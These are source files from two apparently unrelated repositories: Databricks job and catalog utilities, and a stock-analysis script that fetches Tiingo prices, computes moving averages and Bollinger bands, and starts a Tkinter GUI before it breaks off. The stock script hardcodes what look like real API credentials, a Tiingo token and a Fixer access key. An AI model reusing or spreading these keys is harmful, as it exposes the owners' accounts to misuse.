"390a3fc1e595fec7ad0dffc59089acb242f03c91", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 54, "license_type": "permissive", "max_line_length": 39, "num_lines": 2, "path": "/README.md", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "# bricklayer\nGeneral utilities to work in Databricks\n\n" }, { "alpha_fraction": 0.5346433520317078, "alphanum_fraction": 0.5359470844268799, "avg_line_length": 32.767295837402344, "blob_id": "bf776dec36a16060aed4ea2cb6c7cd6f55c4c561", "content_id": "08db29be226ea446166103987b3f756b76ccd609", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10738, "license_type": "permissive", "max_line_length": 109, "num_lines": 318, "path": "/bricklayer/api/__init__.py", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "\"\"\"\n Wrappers for databricks_cli api and bring some sanity back with namespaces.\n Usage:\n ```\n import DBSApi\n # export notebook\n db = DBSApi()\n db.export_notebook(\n source_path='/Repos/deploy/dac-dbs-volume-projection-validation/02_validation_notebooks/90_run_vp_6',\n target_path= '/dbfs/mnt/external/tmp/90_run_vp_6'\n )\n # To save the current notebook to the runs folder\n db.export_current_notebook_run()\n ```\n\"\"\"\n\nimport pathlib\nimport random\nimport datetime\nimport json\n\nimport requests\nfrom databricks_cli.workspace.api import WorkspaceApi\nfrom databricks_cli.jobs.api import JobsApi\nfrom databricks_cli.sdk import ApiClient\nfrom databricks_cli.sdk import JobsService\nfrom databricks_cli.clusters.api import ClusterApi\nfrom databricks_cli.runs.api import RunsApi\n\nfrom .. import get_notebook_context\n\nclass DBJobRun(object):\n '''Wrapper for a Job Run'''\n\n def __init__(self, job, run_id, client):\n self.job = job\n self.run_id = run_id\n self._client = client\n\n @property\n def data(self):\n '''Return the data from the raw API call'''\n return RunsApi(self._client).get_run(self.run_id)\n\n @property\n def result_state(self):\n return self.data['state'].get('result_state')\n\n @property\n def life_cycle_state(self):\n \"\"\"Can be PENDING, RUNNING or TERMINATED\"\"\"\n return self.data['state'].get('life_cycle_state')\n\n @property\n def state_message(self):\n return self.data['state'].get('state_message')\n\n @property\n def run_page_url(self):\n '''Return the URL of the run in the datbricks API'''\n return self.data['run_page_url']\n\n @property\n def attempt_number(self):\n return self.data['attempt_number']\n\n def get_run_output(self):\n '''Return the output of the job as defined in the\n job notebook with a call to `dbutils.notebook.exit` function'''\n data = RunsApi(self._client).get_run_output(self.run_id)\n return data.get('notebook_output')\n\nclass DBJob(object):\n '''Wrapper for a Job Run'''\n def __init__(self, job_id, client):\n self.job_id = job_id\n self._client = client\n self.runs = []\n\n def run_now(self, jar_params=None, notebook_params=None, python_params=None,\n spark_submit_params=None):\n \"\"\"Run this job.\n :param jar_params: list of jars to be included\n :param notebook_params: map (dict) with the params to be passed to the job\n :param python_params: To pa passed to the notebook as if they were command-line parameters\n :param spark_submit_params: A list of parameters for jobs with spark submit task as command-line\n parameters.\n \"\"\"\n data = JobsApi(self._client).run_now(\n self.job_id,\n jar_params=jar_params,\n notebook_params=notebook_params,\n python_params=python_params,\n spark_submit_params=spark_submit_params\n )\n run = DBJobRun(self, data['run_id'], self._client)\n self.runs.append(run)\n return run\n\n def stop(self):\n \"Stop this job.\"\n for run in self.runs:\n JobsService(self._client).client.perform_query(\n 'POST', '/jobs/runs/cancel', data={\n \"run_id\": run.run_id\n }\n )\n\n\nclass DBSApi(object):\n\n def __init__(\n self,\n token=None,\n host=None,\n apiVersion='2.0',\n ):\n if token is None:\n token = get_notebook_context().get_api_token()\n\n if host is None:\n host = get_notebook_context().get_browser_host_name_url()\n\n self._client = ApiClient(\n host=host,\n apiVersion=apiVersion,\n token=token\n )\n\n def export_notebook(self, source_path, target_path, fmt='DBC', is_overwrite=False):\n \"Export a notebook to a local file\"\n (\n WorkspaceApi(self._client)\n .export_workspace(\n source_path,\n target_path,\n fmt,\n is_overwrite\n )\n )\n\n def import_notebook(self, source_path, target_path, language='PYTHON', fmt='DBC', is_overwrite=False):\n \"Import a notebook from a local file\"\n (\n WorkspaceApi(self._client)\n .import_workspace(\n source_path,\n target_path,\n language,\n fmt,\n is_overwrite\n )\n )\n\n def mkdir(self, dir_path):\n \"Create a dir in the workspace\"\n (\n WorkspaceApi(self._client)\n .mkdirs(\n dir_path\n )\n )\n\n def backup_notebook(self, source_path, target_path, fmt=\"DBC\"):\n \"Backup a notebook to another place in the workspace\"\n tmp_dir = '/dbfs/tmp/'\n tmp_name = 'backup'\n intermediate_location = pathlib.Path(tmp_dir).joinpath(tmp_name)\n self.export_notebook(source_path, intermediate_location.as_posix(), fmt)\n try:\n self.import_notebook(intermediate_location, target_path, fmt)\n finally:\n intermediate_location.unlink()\n\n def export_current_notebook_run(self, target_path, fmt=\"DBC\"):\n \"\"\"Save the current notebook to a given location in the required format (default DBC)\n and preserving the path and timestamp.\n Formats allowed:\n SOURCE : The notebook will be imported/exported as source code.\n HTML : The notebook will be imported/exported as an HTML file.\n JUPYTER: The notebook will be imported/exported as a Jupyter/IPython Notebook file.\n DBC\t : The notebook will be imported/exported as Databricks archive format.\n \"\"\"\n current_path = get_notebook_context().get_notebook_path()\n timestamp = datetime.datetime.now().strftime('%Y%m%d%H%M%S')\n target_path = (\n pathlib.Path(target_path)\n .joinpath(current_path[1:])\n .joinpath(timestamp)\n )\n try:\n self.backup_notebook(current_path, target_path.as_posix(), fmt)\n except requests.exceptions.HTTPError as _e:\n error_code = _e.response.json()['error_code']\n if error_code == 'RESOURCE_DOES_NOT_EXIST':\n self.mkdir(target_path.parent.as_posix())\n self.backup_notebook(current_path, target_path.as_posix(), fmt)\n else:\n raise\n\n def create_job(self, notebook_path, job_name=None, cluster_name=None,\n cluster_id=None, notifications_email=None):\n \"\"\"Create a databricks job.\n :param notebook_path: The path of the notebook to be run in the job, can be relative\n :param job_name: Name of the job to be run, if missing it will use the notebook_path\n :param cluster_name: If provided the job will run in the cluster with this name\n :param cluster_id: If provided the job will run in the cluster with this id (should not\n be provided at the same time with cluster_name)\n :param notifications_email: If provided notifications on success or failure on the job run\n will be sent to this email address.\n\n Examples\n --------\n ```\n job = DBSApi().create_job('./dummy_job')\n job.run_now()\n #\n job = DBSApi().create_job('./dummy_job',cluster_name='Shared Writer')\n run = job.run_now(notebook_params={'PARAM':'PARAM_VALUE'})\n #\n # Example on how to run jobs with a max number of concurrent runs\n # this can help when we have capacity limits in cpu in the infrastructure side\n import time\n NUM_JOBS_TO_RUN = 6\n MAX_CONCURRENT_JOBS = 3\n jobs_to_run = [\n DBSApi().create_job('./dummy_job') for x in range(NUM_JOBS_TO_RUN)\n ]\n runs = []\n while True:\n running_runs = list(filter(lambda r:r.life_cycle_state !='TERMINATED', runs))\n print(f'running runs:{len(running_runs)}')\n if len(running_runs) < MAX_CONCURRENT_JOBS:\n if not jobs_to_run:\n break\n job_to_run = jobs_to_run.pop()\n new_run = job_to_run.run_now()\n runs.append(new_run)\n else:\n time.sleep(2)\n ```\n \"\"\"\n if cluster_name:\n assert cluster_id is None\n _cluster_id = ClusterApi(self._client).get_cluster_id_for_name(cluster_name)\n elif cluster_id:\n _cluster_id = cluster_id\n else:\n _cluster_id = get_notebook_context().get_notebook_cluster_id()\n\n if job_name:\n _job_name = job_name\n else:\n _job_name = notebook_path\n\n\n if not pathlib.Path(notebook_path).is_absolute():\n notebook_path = (\n pathlib\n .Path(get_notebook_context().get_notebook_path())\n .parent\n .joinpath(notebook_path)\n .as_posix()\n )\n\n _json = (\n {\n \"name\": _job_name,\n \"existing_cluster_id\": _cluster_id,\n \"notebook_task\": {\n \"notebook_path\": notebook_path\n },\n \"email_notifications\": {\n \"on_success\": [\n notifications_email\n ],\n \"on_failure\": [\n notifications_email\n ]\n }\n }\n )\n jobdata = JobsApi(self._client).create_job(_json)\n return DBJob(\n jobdata['job_id'],\n self._client\n )\n\n def list_jobs(self, job_name='', job_id=''):\n \"\"\"List all jobs with job name or job id\n \"\"\"\n jobs = []\n _jobs = JobsApi(self._client).list_jobs()['jobs']\n\n if job_name:\n result = list(\n filter(\n lambda job:\n job_name in job['settings']['name'],\n _jobs\n ))\n\n if job_id:\n result = list(\n filter(\n lambda job:\n job_id in job['job_id'],\n _jobs\n ))\n\n for jobdata in result:\n job = DBJob(\n jobdata['job_id'],\n self._client\n )\n jobs.append(job)\n\n return jobs\n" }, { "alpha_fraction": 0.5970418453216553, "alphanum_fraction": 0.5995671153068542, "avg_line_length": 30.86206817626953, "blob_id": "8491e3b73e7b449396fd9f20f2e2458b5ed856db", "content_id": "2076af71d2248628800530d3d5079890b7174005", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2772, "license_type": "permissive", "max_line_length": 98, "num_lines": 87, "path": "/bricklayer/catalog/dbricks_catalog.py", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "\"\"\"Module to access the databricks catalog\"\"\"\n\nfrom typing import Iterator\nfrom pyspark.sql.utils import AnalysisException\nfrom pyspark.sql import SparkSession\n\nclass DbricksTable:\n \"\"\"A table found in the databricks catalog\"\"\"\n def __init__(self, database_name, table_name , table_version, info, spark):\n self.database_name = database_name\n self.table_name = table_name\n self.table_version = table_version\n self.spark = spark\n self.info = info\n\n @property\n def table_created_time(self):\n return self.info.get('Created Time')\n\n @property\n def table_type(self):\n return self.info.get('Type')\n\n @property\n def table_provider(self):\n return self.info.get('Provider')\n\n @property\n def table_location(self):\n return self.info.get('Location')\n\n @property\n def is_view(self):\n return self.table_type == 'VIEW'\n\n @property\n def sql_name(self):\n \"\"\"Name of the table as used in SQL\"\"\"\n return f\"{self.database_name}.{self.table_name}_version_{self.table_version}\"\n\nclass DbricksDatabase:\n \"\"\"Database found in the databricks catalog\"\"\"\n \n RELEVANT_TABLE_INFO = {'Created Time', 'Type', 'Provider', 'Location'}\n\n def __init__(self, name, spark):\n self.name = name\n self.spark = spark\n\n def get_tables(self) -> Iterator[DbricksTable]:\n \"\"\"Generator to iterate over the databricks tables\"\"\"\n for table_row in self.spark.sql(f\"SHOW TABLE EXTENDED IN {self.name} LIKE '*'\").collect():\n info = self._parse_extended_info(table_row.information)\n yield DbricksTable(\n self.name,\n table_row.tableName.split('_version_')[0],\n table_row.tableName.split('_version_')[-1],\n info=info,\n spark=self.spark\n )\n\n def _parse_extended_info(self, info):\n result = {}\n for line in info.split('\\n'):\n line_parts = line.split(':', maxsplit=1)\n if len(line_parts) > 1:\n if line_parts[0] in self.RELEVANT_TABLE_INFO:\n result[line_parts[0]] = line_parts[1].strip()\n return result\n\n\n def __repr__(self):\n return f\"{self.__class__.__name__}:{self.name}\"\n\nclass DbricksCatalog:\n \"\"\"Databricks catalog\"\"\"\n\n def __init__(self, spark=None):\n if spark is None:\n self.spark = SparkSession.builder.getOrCreate()\n else:\n self.spark = spark\n\n def get_databases(self) -> Iterator[DbricksDatabase]:\n \"\"\"Iterator over all the databases in the databricks catalog\"\"\"\n for db_row in self.spark.sql('SHOW DATABASES').collect():\n yield DbricksDatabase(db_row.databaseName, spark=self.spark)\n" }, { "alpha_fraction": 0.6361221671104431, "alphanum_fraction": 0.642762303352356, "avg_line_length": 27.961538314819336, "blob_id": "580c3d8483d0561a1dbe34d356c25e1cf27f3be8", "content_id": "4a86e2447566f1104cbb9a3368119c09a08e58b8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 753, "license_type": "permissive", "max_line_length": 56, "num_lines": 26, "path": "/setup.py", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "import setuptools\n\nwith open('bricklayer/__version__.py') as fd:\n version = fd.read().split('=')[1].strip().strip(\"'\")\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"bricklayer\",\n version=version,\n author=\"Intelematics\",\n description=\"Internal Databricks utils\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/intelematics/bricklayer\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n install_requires=[\n 'databricks_cli', 'shapely', 'folium'\n ]\n)\n" }, { "alpha_fraction": 0.5715256929397583, "alphanum_fraction": 0.5732934474945068, "avg_line_length": 37.91005325317383, "blob_id": "e4d0378288a9ba57fd81f9cdc15376bf1b5dd841", "content_id": "945322ab6b7812606eef915aaf039328a09542da", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7354, "license_type": "permissive", "max_line_length": 145, "num_lines": 189, "path": "/bricklayer/display/map/__init__.py", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "''' Module to display a folium map in databricks notebooks'''\nimport math\n\nimport pyspark\nfrom pyspark.sql import SparkSession\n\nimport pandas as pd\nimport folium\n\nimport shapely.wkt as wkt\nimport shapely.geometry\nimport shapely.geometry.base\n\n\nclass Layer():\n ''' Layer to be rendered in the map '''\n\n def __init__(self, data, geometry_col=None, popup_attrs=False, color='red',\n weight=None, radius=1):\n \"\"\"\n Args:\n data (*): pandas dataframe, or a geodataframe or a spark dataframe or a databricks SQL query.\n popup_attrs (list): the attributes used to populate a pop up, if False there will be no popup. If True it will put all the attrs.\n color (str): Color to render the layer. Color name or RGB. (i.e. '#3388ff')\n weight (int): Width of the stroke when rendering lines or points. By default is 1.\n radius (int): Radius of the circles used for points default is 1.\n\n Returns:\n folium.Map: Folium map to be rendered.\n \"\"\"\n dataframe = self.get_dataframe(data)\n if dataframe.empty:\n raise ValueError('No data to display')\n self.geometry_col = self.get_geometry_col(geometry_col, dataframe)\n self.dataframe = self.get_dataframe_with_geom(dataframe, self.geometry_col)\n self.centroid = self.get_centroid(self.dataframe, self.geometry_col)\n self.popup_attrs = popup_attrs\n self.color = color\n self.weight = weight\n self.radius = radius\n\n def get_geometry_col(self, geometry_col: str, dataframe: pd.DataFrame):\n '''Return the name of the geometry column'''\n if geometry_col is not None:\n if geometry_col not in dataframe.columns:\n raise ValueError(f\"Column {geometry_col} not found in data columns\")\n return geometry_col\n else:\n candidates = []\n for column in dataframe.columns:\n if 'geom' in column:\n candidates.append(column)\n elif 'geography' in column:\n candidates.append(column)\n elif 'wkt' in column:\n candidates.append(column)\n if len(candidates) > 1:\n raise ValueError(\"Specify the geometry_col argument for the data\")\n return candidates[0]\n\n def get_dataframe(self, data)->pd.DataFrame:\n '''Get the data in a pandas DataFrame'''\n if isinstance(data, pd.DataFrame):\n return data.copy()\n if isinstance(data, pyspark.sql.dataframe.DataFrame):\n return data.toPandas()\n if isinstance(data, str):\n spark = SparkSession.builder.getOrCreate()\n return spark.sql(data).toPandas()\n raise NotImplementedError(f\"Can't interpret data with type {type(data)}\")\n\n def get_dataframe_with_geom(self, dataframe: pd.DataFrame, geometry_col: str):\n '''Convert the geometry column to a shapely geometry'''\n geom = dataframe.iloc[0][geometry_col]\n if isinstance(geom, str):\n dataframe[geometry_col] = dataframe[geometry_col].apply(wkt.loads)\n return dataframe\n if isinstance(geom, shapely.geometry.base.BaseGeometry):\n return dataframe\n raise ValueError(f\"Invalida type for geometry_colum in the data ({type(geom)})\")\n\n def get_centroid(self, datafraame: pd.DataFrame, geometry_col: str):\n '''Get the centroid of all the geometries in the layer'''\n centroids = [r.centroid for _, r in datafraame[geometry_col].items()]\n multipoint = shapely.geometry.MultiPoint(centroids)\n return multipoint.centroid\n\n def get_popup(self, row: pd.Series):\n '''Get a folium pop-up with the requested attributes'''\n if isinstance(self.popup_attrs, list):\n non_geom_cols = self.popup_attrs\n else:\n non_geom_cols = list(self.dataframe.columns)\n non_geom_cols.remove(self.geometry_col)\n\n return folium.Popup((\n row\n [non_geom_cols]\n .to_frame()\n .to_html()\n ))\n\n def get_map_geom(self, row: pd.Series):\n '''Get folium geometry from the shapely geom'''\n sgeom = row[self.geometry_col]\n kwargs = {'color': self.color}\n if self.popup_attrs:\n html_popup = self.get_popup(row)\n else:\n html_popup = None\n if self.weight is not None:\n kwargs['weight'] = self.weight\n if isinstance(sgeom, shapely.geometry.LineString):\n coords = [(y, x) for x,y in sgeom.coords]\n fgeom = folium.PolyLine(\n coords,\n **kwargs\n )\n elif isinstance(sgeom, shapely.geometry.Point):\n kwargs['radius'] = self.radius\n coords = [(y, x) for x,y in sgeom.coords]\n fgeom = folium.CircleMarker(\n coords[0],\n **kwargs\n )\n else:\n raise NotImplementedError(f'Geometry Type not Supported {type(sgeom)}')\n if html_popup:\n fgeom.add_child(html_popup)\n return fgeom\n\n def get_bounds(self):\n '''Get the bounds for all the geometries'''\n minx, miny, maxx, maxy = None, None, None, None\n geoms_bounds = self.dataframe[self.geometry_col].apply(lambda g:g.bounds)\n for _minx, _miny, _maxx, _maxy in geoms_bounds:\n if minx is None:\n minx, miny, maxx, maxy = _minx, _miny, _maxx, _maxy\n else:\n minx = min(minx, _minx)\n miny = min(miny, _miny)\n maxx = max(maxx, _maxx)\n maxy = max(maxy, _maxy)\n return minx, miny, maxx, maxy\n\n def render_to_map(self, folium_map):\n '''Render the layer into the map'''\n for _, row in self.dataframe.iterrows():\n map_geom = self.get_map_geom(row)\n map_geom.add_to(folium_map)\n\nclass Map():\n '''Map that can render layers'''\n\n def __init__(self, layers: list, **map_args):\n self.layers = layers\n self.map_args = map_args.copy()\n self.map_args['zoom_start'] = self.map_args.get('zoom_start', 13)\n\n def get_centroid(self):\n '''Get the centroid of all the layers'''\n centroids = [layer.centroid for layer in self.layers]\n multipoint = shapely.geometry.MultiPoint(centroids)\n return multipoint.centroid\n\n def get_bounds(self):\n '''Get the bounds of all the layers'''\n minx, miny, maxx, maxy = None, None, None, None\n for layer in self.layers:\n _minx, _miny, _maxx, _maxy = layer.get_bounds()\n if minx is None:\n minx, miny, maxx, maxy = _minx, _miny, _maxx,_maxy\n else:\n minx = min(minx, _minx)\n miny = min(miny, _miny)\n maxx = max(maxx, _maxx)\n maxy = max(maxy, _maxy)\n return minx, miny, maxx, maxy\n\n def render(self):\n '''Render the map'''\n map_centroid = self.get_centroid()\n folium_map = folium.Map(\n [map_centroid.y,map_centroid.x],\n **self.map_args\n )\n for layer in self.layers:\n layer.render_to_map(folium_map)\n return folium_map\n" }, { "alpha_fraction": 0.7884615659713745, "alphanum_fraction": 0.7884615659713745, "avg_line_length": 25, "blob_id": "30da7b5b4de56b63000f15afc575cb07e364d82c", "content_id": "d69301e84ea1b27ffc00b467994f4d112a90d17e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52, "license_type": "permissive", "max_line_length": 29, "num_lines": 2, "path": "/bricklayer/catalog/__init__.py", "repo_name": "mao-liu/bricklayer", "src_encoding": "UTF-8", "text": "from . import dbricks_catalog\nfrom . import crawler\n" } ]
9
manikpurivibhu/Stocks-Analysis
https://github.com/manikpurivibhu/Stocks-Analysis
9829b55e3af458ac8abb8147baacdb218aeb23c3
ae69b814b12034dae1e527802382c1eb037da037
4afad80ebc401a099e5045cb0d1020ccdd62c9a9
refs/heads/master
2023-04-18T17:36:36.068713
2021-05-03T11:26:48
2021-05-03T11:26:48
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7220744490623474, "alphanum_fraction": 0.7327127456665039, "avg_line_length": 23.25806427001953, "blob_id": "53b89d84a29d06c74922d793eec51a4a6204d974", "content_id": "00feaaf08c80a790e000a4f63a676ec37d9b8e23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 752, "license_type": "no_license", "max_line_length": 131, "num_lines": 31, "path": "/README.md", "repo_name": "manikpurivibhu/Stocks-Analysis", "src_encoding": "UTF-8", "text": "# Stocks Analysis\n\n \n This GUI application prompts for Stock Ticker and range of dates and analyzes and visualizes Historical Stock Data of said ticker.\n This Project was made using Python and it's libraries including but not limited to Pandas, Matplotlib and Tkinter.\n \n \n # INSTRUCTION\n \n To run this file,dowload [exe](https://github.com/vibhu-exe/Stocks-Analysis) in your pc :computer:\n and install it on your local device\n \n # Thank You For Downloading The Project :smile:\n \n # :hearts:\n \n # SCREENSHOTS\n\n1.)Home Page\n ![o1](dist/images/Home%20Page.JPG)\n \n 1.1)Home Page (alternate inputs)\n ![](dist/images/Home.JPG)\n \n2.)Analysis\n ![](dist/images/Analysis.JPG)\n\n3.)Visualization\n ![](dist/images/Visualization.JPG)\n \n ![](dist/images/Visual.JPG)\n" }, { "alpha_fraction": 0.6072845458984375, "alphanum_fraction": 0.6253942251205444, "avg_line_length": 34.875911712646484, "blob_id": "ad86131918d4ef958eb0d4f3ec834d85f2979bf8", "content_id": "151c91984444bbbadd8df4e5196c9ab4cca5cd40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9829, "license_type": "no_license", "max_line_length": 142, "num_lines": 274, "path": "/stocks_analysis.py", "repo_name": "manikpurivibhu/Stocks-Analysis", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams \nimport requests\nimport json\nfrom datetime import datetime\nimport re\nfrom IPython.display import display\n#import tkinter as tk\nfrom tkinter import *\n\n#Companies and their corresponding info\nstock_symbols = pd.read_csv('ticker_list.csv')\nstock_symbols.dropna(axis = 0)\nstock_symbols.set_index(stock_symbols['Name'], inplace = True)\n\n#function to fetch symbol on passing company name as parameter\ndef get_sym(comp_name):\n return stock_symbols.loc[comp_name]['Symbol']\n\n\n#Prompting user or symbol or company name to fetch symboltry:\ndef get_ticker() :\n try:\n global symbol\n symbol = str(input(\"Enter company Symbol or name : \"))\n if symbol in stock_symbols['Symbol'].values:\n pass\n else: \n sym = get_sym(symbol)\n if sym in stock_symbols['Symbol'].values:\n symbol = sym\n print(\"Symbol :\\t\", sym)\n \n except KeyError as e:\n print(\"\\n\\nPlease enter valid Company name or it's Ticker.\")\n get_ticker()\n\nget_ticker()\n\n\n#Prompting user for start and end dates\ndef get_dates():\n global start_date, end_date, cheat\n try:\n start_date = pd.Timestamp(input(\"\\nEnter start date for Stock analysis:\\t\"), tz = \"Asia/Kolkata\")\n if (pd.isnull(start_date) == True):\n print(\"\\nPlease enter a Start Date for Analysis :\")\n get_dates()\n end_date = pd.Timestamp(input(\"\\nEnter End Date for Stock analysis:\\t\"), tz = \"Asia/Kolkata\")\n cheat = 'input'\n if (pd.isnull(end_date) == True) :\n cheat = 'default'\n end_date = pd.to_datetime(\"today\")\n print(end_date.date())\n if (start_date > end_date) : \n print(\"\\n\\nStart Date can not be later than End Date\")\n get_dates()\n except ValueError as e:\n print(\"\\nPlease enter valid date (yyyy-mm-dd)\")\n get_dates()\n except TypeError as t:\n print(\"\\nPlease enter value(s).\\n\\nNvm if valid dates already entered\")\n \nget_dates()\n\n\n#url for fetching stock data for given symbol and start date\nurl = \"https://api.tiingo.com/tiingo/daily/\" + symbol + \"/prices?startDate=\" + str(start_date)[:10] + \"&token=087e4fc0c07b596eec220c6f75fab6680dcda7d8\"\n#print(url)\n\n#gets stock info in json format for symbol from start date\nheaders = {\n 'Content-Type': 'application/json'\n}\nrequestResponse = requests.get(url, headers = headers) \njson_stock_obj = requestResponse.json()\n\n#creating jsonfile from json oject so that it can be loaded to a dataframe\njson_file = open(\"json_file.json\", \"w+\") \njson.dump(json_stock_obj, json_file, indent = 6) \njson_file.close() \n\n#loading fetched stock data to pandas dataframe\nstock_data = pd.read_json('json_file.json')\n\ntry: \n if(cheat=='default'):\n stocks = stock_data.set_index(keys = stock_data['date']).loc[start_date:]\n else:\n stocks = stock_data.set_index(keys = stock_data['date']).loc[start_date:end_date]\nexcept ValueError as V:\n print(\"Please enter Valid dates\")\n\n\n#get currency conversion rates from 'fixer' api\ncurrency = requests.get('http://data.fixer.io/api/latest?access_key=87af610b8afee0f3be1a812640ebd6ff').json()\ncur = currency['rates']\n\n#currency conversion USD -> INR\ndef curconv(val):\n return round(((val / cur['USD']) * cur['INR']), 2)\nstocks = stocks.apply((lambda x: curconv(x) if x.name in ['close', 'open', 'high', 'low', 'adjClose', 'adjOpen', 'adjHigh', 'adjLow'] else x))\n\n\n#ANALYSIS\n\nanalysis = stocks.describe()\nanalysis = analysis.loc[['count', 'mean', 'std', 'min', 'max']].drop(['divCash','splitFactor'], axis = 1)\nanalysis.rename(columns={\"close\": \"Close\", \"high\": \"High\", \"low\": \"Low\",\n \"open\": \"Open\", \"volume\": \"Volume\", \"adjClose\": \"Adjacent Close\",\n \"adjHigh\": \"Adjacent High\", \"adjLow\": \"Adjacent Low\",\n \"adjOpen\": \"Adjacent Open\"}, errors=\"raise\",inplace = True)\nprint(\"\\n\\nStastical Analysis of \" + symbol + \"'s Historical Stock data : \\n\\n\")\ndisplay(analysis)\n\n\n#Simple Moving Average\nstocks['SMAshort'] = stocks['close'].rolling(window = 20).mean()\nstocks['SMAextended'] = stocks['close'].rolling(window = 100).mean()\nwindows = stocks['close'].rolling(10)\nmoving_averages = windows.mean()\n\n#Bollinger Bands\nstocks['middle_band'] = stocks['close'].rolling(window = 20).mean()\nstocks['upper_band'] = stocks['close'].rolling(window = 20).mean() + stocks['close'].rolling(window = 20).std()*2\nstocks['lower_band'] = stocks['close'].rolling(window = 20).mean() - stocks['close'].rolling(window = 20).std()*2\n\n#VISUALIZATION\n\n##Plotting function\ndef plot_data(xlen, ylen, label1, label2, title1, is_sub = False, label3 = None, label4 = None, title2 = None):\n \n dict = {\"Open\" : \"open\", \"Close\" : \"close\", \"High\" : \"high\", \"Low\" : \"low\", \"Volume\" : \"volume\",\n \"Adjacent Open\": \"adjOpen\", \"Adjacent Close\": \"adjClose\", \"Adjacent High\": \"adjHigh\",\n \"Adjacent Low\" : \"adjLow\", \"Adjacent Volume\" : \"adjVolume\", \n \"Simple Moving Average (20 days)\" : \"SMAshort\", \"Simple Moving Average (100 days)\" : \"SMAextended\",\n \"Upper Bollinger Band\" : \"upper_band\", \"Lower Bollinger Band\" : \"lower_band\", \n \"Middle Bollinger Band\" : \"middle_band\"}\n \n rcParams['figure.figsize'] = xlen, ylen\n sub = is_sub\n if sub is True:\n fig, (s1, s2) = plt.subplots(1,2)\n s1.grid(True, color = 'k', linestyle = ':')\n s2.grid(True, color = 'k', linestyle = ':')\n s1.plot(stocks[dict[label1]],color = 'g', label = label1)\n s1.plot(stocks[dict[label2]],color = 'b', label = label2)\n s1.set_title(title1)\n s1.legend(loc=\"upper left\", bbox_to_anchor=[0,1],\n ncol=1, shadow=True) \n\n s2.plot(stocks[dict[label3]],color = 'g', label = 'Open')\n s2.plot(stocks[dict[label4]],color = 'b', label = 'Close')\n s2.set_title(title2)\n s2.legend(loc=\"upper left\", bbox_to_anchor=[0,1],\n ncol=1, shadow=True)\n \n else:\n plt.plot(stocks[dict[label1]], color = 'g', label = label1)\n plt.plot(stocks[dict[label2]], color = 'b', label = label2)\n #plt.plot(stocks[dict[label3]], color = 'k', label = label3)\n #plt.plot(stocks[dict[label4]], color = 'r', label = label4) \n plt.legend()\n plt.grid(True, color = 'k', linestyle = ':')\n plt.title(title1)\n \n \n \n plt.xlabel(\"Date\")\n plt.ylabel(\"Price(INR)\")\n\n plt.style.use('seaborn-darkgrid')\n plt.show()\n\n\n##Advanced Plotting Graph\n\ndef plot_analysis(xlen, ylen, label1, label2, title, label3 = None, label4 = None):\n \n dict = {\"Close\" : \"close\", \"Simple Moving Average (20 days)\" : \"SMAshort\", \"Simple Moving Average (100 days)\" : \"SMAextended\",\n \"Upper Bollinger Band\" : \"upper_band\", \"Lower Bollinger Band\" : \"lower_band\", \n \"Middle Bollinger Band\" : \"middle_band\"}\n \n rcParams['figure.figsize'] = xlen, ylen\n \n \n plt.plot(stocks[dict[label1]], color = 'g', label = label1)\n plt.plot(stocks[dict[label2]], color = 'b', label = label2)\n plt.plot(stocks[dict[label3]], color = 'k', label = label3)\n if label4 is not None:\n plt.plot(stocks[dict[label4]], color = 'r', label = label4) \n plt.legend()\n plt.grid(True, color = 'k', linestyle = ':')\n plt.title(title)\n plt.show()\n\n\n#Open/Close - Adjacent Open/Adjacent Close\ndef openclose():\n plot_data(xlen = 15, ylen = 4, label1 = \"Open\", label2 = \"Close\", title1 = \"Open/Close\", is_sub = True,\n label3 = \"Adjacent Open\",label4 = \"Adjacent Close\", title2 = \"Adjacent Open/ Adjacent Close\")\n\n#High/Low - ADjacent High/Adjacent Low\ndef highlow():\n plot_data(xlen = 16, ylen = 4, label1 = \"High\", label2 = \"Low\", title1 = \"High/Low\", is_sub = True,\n label3 = \"Adjacent High\",label4 = \"Adjacent Low\", title2 = \"Adjacent High/ Adjacent Low\") \n\n#Volume/Adjacent Volume\ndef vol():\n plot_data(xlen = 13.5, ylen = 6, label1 = \"Volume\", label2 = \"Adjacent Volume\", title1 = \"Volume/Adjacent Volume\")\n\n#SMA\ndef sma():\n plot_analysis(xlen = 14, ylen = 8, label1 = \"Close\", label2 = \"Simple Moving Average (20 days)\", \n label3 = \"Simple Moving Average (100 days)\", title = \"Simple Moving Average\")\n\n#Bollinger Bands\ndef bands():\n plot_analysis(xlen = 12, ylen = 6, label1 = \"Close\", label2 = \"Upper Bollinger Band\", \n label3 = \"Middle Bollinger Band\", label4 = \"Lower Bollinger Band\", title = \"Bollinger Bands\")\n\n\n\n#GUI for handling multiple plots\n\nroot = Tk()\nroot.title('Stocks Analysis')\nroot.geometry('3500x2800')\n\nvar = IntVar()\nvar.set(\"1\")\n\nmainframe = Frame(root)\nmainframe.pack()\n\nimgframe = Frame(root)\nimgframe.place(x=0,y=0,relheight=1,relwidth=1)\n\nimg = 